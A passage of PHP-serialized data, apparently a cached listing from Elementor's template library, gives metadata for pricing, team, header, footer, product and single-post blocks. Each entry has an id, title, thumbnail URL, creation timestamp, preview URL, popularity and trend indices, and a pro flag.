9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443315\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"426\";s:11:\"trend_index\";s:3:\"422\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:217;a:14:{s:2:\"id\";s:4:\"9119\";s:5:\"title\";s:10:\"footer 015\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/Footer_GetStarted_350.png\";s:12:\"tmpl_created\";s:10:\"1532428138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/blocks/demo/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"319\";s:11:\"trend_index\";s:3:\"212\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:218;a:14:{s:2:\"id\";s:4:\"4545\";s:5:\"title\";s:9:\"Pricing 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_3.png\";s:12:\"tmpl_created\";s:10:\"1520443317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"436\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:219;a:14:{s:2:\"id\";s:4:\"9127\";s:5:\"title\";s:9:\"header 13\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2018/07/Header_get_started_1200V3.png\";s:12:\"tmpl_created\";s:10:\"1532428699\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/header-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"47\";s:11:\"trend_index\";s:2:\"93\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:220;a:14:{s:2:\"id\";s:4:\"4553\";s:5:\"title\";s:10:\"Pricing 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_4.png\";s:12:\"tmpl_created\";s:10:\"1520443319\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"410\";s:11:\"trend_index\";s:3:\"298\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:221;a:14:{s:2:\"id\";s:4:\"4562\";s:5:\"title\";s:9:\"Pricing 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_4.png\";s:12:\"tmpl_created\";s:10:\"1520443322\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"435\";s:11:\"trend_index\";s:3:\"432\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:222;a:14:{s:2:\"id\";s:4:\"4572\";s:5:\"title\";s:10:\"Pricing 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443324\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"326\";s:11:\"trend_index\";s:3:\"282\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:223;a:14:{s:2:\"id\";s:4:\"9174\";s:5:\"title\";s:17:\"single product 01\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product01_350.png\";s:12:\"tmpl_created\";s:10:\"1532950125\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"128\";s:11:\"trend_index\";s:2:\"53\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:224;a:14:{s:2:\"id\";s:4:\"4580\";s:5:\"title\";s:10:\"Pricing 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520443326\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"421\";s:11:\"trend_index\";s:3:\"397\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:225;a:14:{s:2:\"id\";s:4:\"9178\";s:5:\"title\";s:17:\"single product 02\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product02_350new.png\";s:12:\"tmpl_created\";s:10:\"1532951997\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-02/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"173\";s:11:\"trend_index\";s:2:\"96\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:226;a:14:{s:2:\"id\";s:4:\"4589\";s:5:\"title\";s:9:\"Pricing 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_6.png\";s:12:\"tmpl_created\";s:10:\"1520443327\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"437\";s:11:\"trend_index\";s:3:\"428\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:227;a:14:{s:2:\"id\";s:4:\"9180\";s:5:\"title\";s:17:\"single product 03\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product03_350.png\";s:12:\"tmpl_created\";s:10:\"1532952302\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-03/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"215\";s:11:\"trend_index\";s:3:\"170\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:228;a:14:{s:2:\"id\";s:4:\"4597\";s:5:\"title\";s:10:\"Pricing 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_7.png\";s:12:\"tmpl_created\";s:10:\"1520443330\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"427\";s:11:\"trend_index\";s:3:\"331\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:229;a:14:{s:2:\"id\";s:4:\"9182\";s:5:\"title\";s:17:\"single product 04\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product040_350.png\";s:12:\"tmpl_created\";s:10:\"1532952606\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/single-product-04/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"250\";s:11:\"trend_index\";s:3:\"154\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:230;a:14:{s:2:\"id\";s:4:\"4605\";s:5:\"title\";s:9:\"Pricing 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_black_7.png\";s:12:\"tmpl_created\";s:10:\"1520443332\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/pricing-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"439\";s:11:\"trend_index\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:231;a:14:{s:2:\"id\";s:4:\"9239\";s:5:\"title\";s:17:\"product archive 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-1.png\";s:12:\"tmpl_created\";s:10:\"1532953482\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/product-archive-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"182\";s:11:\"trend_index\";s:2:\"97\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:232;a:14:{s:2:\"id\";s:4:\"4613\";s:5:\"title\";s:10:\"Pricing 14\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/02/price_white_8.png\";s:12:\"tmpl_created\";s:10:\"1520443334\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/pricing-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:7:\"pricing\";s:4:\"tags\";s:11:\"[\"pricing\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"418\";s:11:\"trend_index\";s:3:\"361\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:233;a:14:{s:2:\"id\";s:4:\"9247\";s:5:\"title\";s:17:\"product archive 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-2.png\";s:12:\"tmpl_created\";s:10:\"1532953793\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/product-archive-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"197\";s:11:\"trend_index\";s:3:\"115\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:234;a:14:{s:2:\"id\";s:4:\"9254\";s:5:\"title\";s:17:\"product archive 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2018/07/product-archive-350-3.png\";s:12:\"tmpl_created\";s:10:\"1532954032\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/product-archive-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:15:\"product archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"205\";s:11:\"trend_index\";s:3:\"110\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:235;a:14:{s:2:\"id\";s:4:\"9301\";s:5:\"title\";s:13:\"Single Post 4\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3003.jpg\";s:12:\"tmpl_created\";s:10:\"1537440661\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"297\";s:11:\"trend_index\";s:2:\"84\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:236;a:14:{s:2:\"id\";s:4:\"9296\";s:5:\"title\";s:13:\"Single Post 3\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3002.jpg\";s:12:\"tmpl_created\";s:10:\"1537440673\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"328\";s:11:\"trend_index\";s:3:\"148\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:237;a:14:{s:2:\"id\";s:4:\"9313\";s:5:\"title\";s:13:\"Single Post 5\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3001.jpg\";s:12:\"tmpl_created\";s:10:\"1537440798\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"276\";s:11:\"trend_index\";s:3:\"139\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:238;a:14:{s:2:\"id\";s:4:\"9343\";s:5:\"title\";s:13:\"Single Post 6\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3004.jpg\";s:12:\"tmpl_created\";s:10:\"1537443531\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"305\";s:11:\"trend_index\";s:3:\"176\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:239;a:14:{s:2:\"id\";s:4:\"9349\";s:5:\"title\";s:13:\"Single Post 7\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3005.jpg\";s:12:\"tmpl_created\";s:10:\"1537443903\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/blocks/single-post-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"229\";s:11:\"trend_index\";s:2:\"74\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:240;a:14:{s:2:\"id\";s:4:\"9373\";s:5:\"title\";s:33:\"Landing Page &#8211; Conference 5\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/11/conference-250.png\";s:12:\"tmpl_created\";s:10:\"1542811219\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/landing-page-conference-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"313\";s:11:\"trend_index\";s:2:\"85\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:241;a:14:{s:2:\"id\";s:4:\"4690\";s:5:\"title\";s:6:\"Team 7\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443348\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"240\";s:11:\"trend_index\";s:3:\"245\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:242;a:14:{s:2:\"id\";s:4:\"9425\";s:5:\"title\";s:38:\"Black Friday &#8211;  80&#8217;s style\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/11/unnamed-file.png\";s:12:\"tmpl_created\";s:10:\"1542901234\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/black-friday-80s-style/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"359\";s:11:\"trend_index\";s:2:\"80\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:243;a:14:{s:2:\"id\";s:4:\"4698\";s:5:\"title\";s:7:\"Team 15\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443350\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"377\";s:11:\"trend_index\";s:3:\"383\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:244;a:14:{s:2:\"id\";s:4:\"4706\";s:5:\"title\";s:6:\"Team 5\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_2.png\";s:12:\"tmpl_created\";s:10:\"1520443352\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"138\";s:11:\"trend_index\";s:3:\"138\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:245;a:14:{s:2:\"id\";s:4:\"4718\";s:5:\"title\";s:6:\"Team 4\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443354\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"171\";s:11:\"trend_index\";s:3:\"191\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:246;a:14:{s:2:\"id\";s:4:\"4727\";s:5:\"title\";s:7:\"Team 13\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_2.png\";s:12:\"tmpl_created\";s:10:\"1520443356\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"357\";s:11:\"trend_index\";s:3:\"309\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:247;a:14:{s:2:\"id\";s:4:\"4736\";s:5:\"title\";s:7:\"Team 20\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_4.png\";s:12:\"tmpl_created\";s:10:\"1520443358\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-20/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"141\";s:11:\"trend_index\";s:3:\"149\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:248;a:14:{s:2:\"id\";s:4:\"4746\";s:5:\"title\";s:7:\"Team 23\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_4.png\";s:12:\"tmpl_created\";s:10:\"1520443360\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-23/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"242\";s:11:\"trend_index\";s:3:\"227\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:249;a:14:{s:2:\"id\";s:4:\"4759\";s:5:\"title\";s:7:\"Team 22\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443362\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-22/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"283\";s:11:\"trend_index\";s:3:\"284\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:250;a:14:{s:2:\"id\";s:4:\"4770\";s:5:\"title\";s:7:\"Team 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_6.png\";s:12:\"tmpl_created\";s:10:\"1520443364\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/team-12-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"354\";s:11:\"trend_index\";s:3:\"380\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:251;a:14:{s:2:\"id\";s:4:\"4781\";s:5:\"title\";s:7:\"Team 16\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_7.png\";s:12:\"tmpl_created\";s:10:\"1520443365\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-16/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"211\";s:11:\"trend_index\";s:3:\"210\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:252;a:14:{s:2:\"id\";s:4:\"4793\";s:5:\"title\";s:7:\"Team 18\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_8.png\";s:12:\"tmpl_created\";s:10:\"1520443367\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-18/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"190\";s:11:\"trend_index\";s:3:\"183\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:253;a:14:{s:2:\"id\";s:4:\"4801\";s:5:\"title\";s:7:\"Team 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_8.png\";s:12:\"tmpl_created\";s:10:\"1520443369\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"329\";s:11:\"trend_index\";s:3:\"279\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:254;a:14:{s:2:\"id\";s:4:\"4809\";s:5:\"title\";s:7:\"Team 